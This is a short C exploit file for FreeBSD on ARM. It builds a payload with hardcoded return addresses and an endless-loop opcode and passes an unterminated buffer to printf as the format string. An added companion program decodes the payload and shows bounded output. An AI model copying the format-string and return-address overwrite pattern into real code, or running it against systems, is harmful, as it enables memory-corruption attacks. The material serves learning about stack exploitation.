exploit.c
```c
/* simple exploit
Copyright (C) 2014 [email protected]
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details. */
#include <stdio.h>

int main(void)
{
    /* NOTE: This will only work on FreeBSD ARM, and probably even more specifically on a few Raspberry Pis running FreeBSD.
       Stack layout in ARM:
         fp[-0] saved pc, where we stored this frame.
         fp[-1] saved lr, the return address for this function.
         fp[-2] previous sp, before this function eats stack.
         fp[-3] previous fp, the last stack frame.
       We overwrite the return address with 0xbfffec70, which is most of the time the address where our shellcode is stored. Sometimes it has also been 0xbfffec40, especially if I attached gdb.
       This works only in about 70 % of cases. Maybe it tries to access the stack sometimes.
       0xeafffffe is the ARM opcode for "label: b label", or simply an endless loop. Unfortunately the ARM opcode of the NOP instruction contains NUL bytes, and the 0x90 I filled the rest of the 12 bytes with can't be executed by my RPI for obvious reasons. */
    /* 24 bytes in a 24-byte array: legal C, but there is no room for a NUL terminator,
       so printf() keeps reading past the end of the buffer. */
    char input[24] = "\xfe\xff\xff\xea\x90\x90\x90\x90\x90\x90\x90\x90\x40\xec\xff\xbf\x40\xec\xff\xbf\x78\xec\xff\xbf"; // when gdb 40 else 78
    /* The buffer itself is passed as the format string. The original wrote printf(&input),
       which is the same address with the wrong pointer type (char (*)[24]); behaviour is unchanged. */
    printf(input);
    return 0;
}
```
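As an added, defensive companion to the listing above (example code, not part of this repository): it decodes the same 24-byte buffer into little-endian words to show the "b ." opcode and the three stack addresses the comment describes, checks the property that makes `printf(input)` read past the array (no NUL terminator within 24 bytes), and shows the length-bounded way to emit such a buffer. The function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 24 bytes from exploit.c. A 24-char array initialised with a 24-character
 * literal is legal C but leaves no room for a NUL terminator. */
static const char payload[24] =
    "\xfe\xff\xff\xea\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x40\xec\xff\xbf\x40\xec\xff\xbf\x78\xec\xff\xbf";

/* 1 if a NUL byte occurs within the first n bytes of buf, else 0. printf() on a
 * buffer without one keeps reading past its end. */
int is_nul_terminated(const char *buf, size_t n)
{
    return memchr(buf, '\0', n) != NULL;
}

/* Decode buf as little-endian 32-bit words (the ARM on the RPi is little-endian).
 * Returns the number of complete words stored in out. */
size_t decode_le_words(const unsigned char *buf, size_t n, uint32_t *out, size_t max_out)
{
    size_t i, count = 0;
    for (i = 0; i + 4 <= n && count < max_out; i += 4, count++)
        out[count] = (uint32_t)buf[i] | (uint32_t)buf[i + 1] << 8 |
                     (uint32_t)buf[i + 2] << 16 | (uint32_t)buf[i + 3] << 24;
    return count;
}

/* The ARM encoding of "label: b label" that exploit.c uses instead of NOP. */
int is_branch_to_self(uint32_t w)
{
    return w == 0xeafffffeu;
}

/* The bounded way to emit a fixed-size, possibly unterminated buffer: the length
 * is explicit and the bytes are never used as a format string. Returns bytes written. */
size_t write_bytes(const char *buf, size_t n, FILE *fp)
{
    return fwrite(buf, 1, n, fp);
}
int main(void)
{
    uint32_t words[8];
    size_t i, n = decode_le_words((const unsigned char *)payload, sizeof payload, words, 8);
    printf("NUL-terminated: %d\n", is_nul_terminated(payload, sizeof payload));
    for (i = 0; i < n; i++)
        printf("word %zu: 0x%08x%s\n", i, (unsigned)words[i], is_branch_to_self(words[i]) ? " (b .)" : "");
    return 0;
}
```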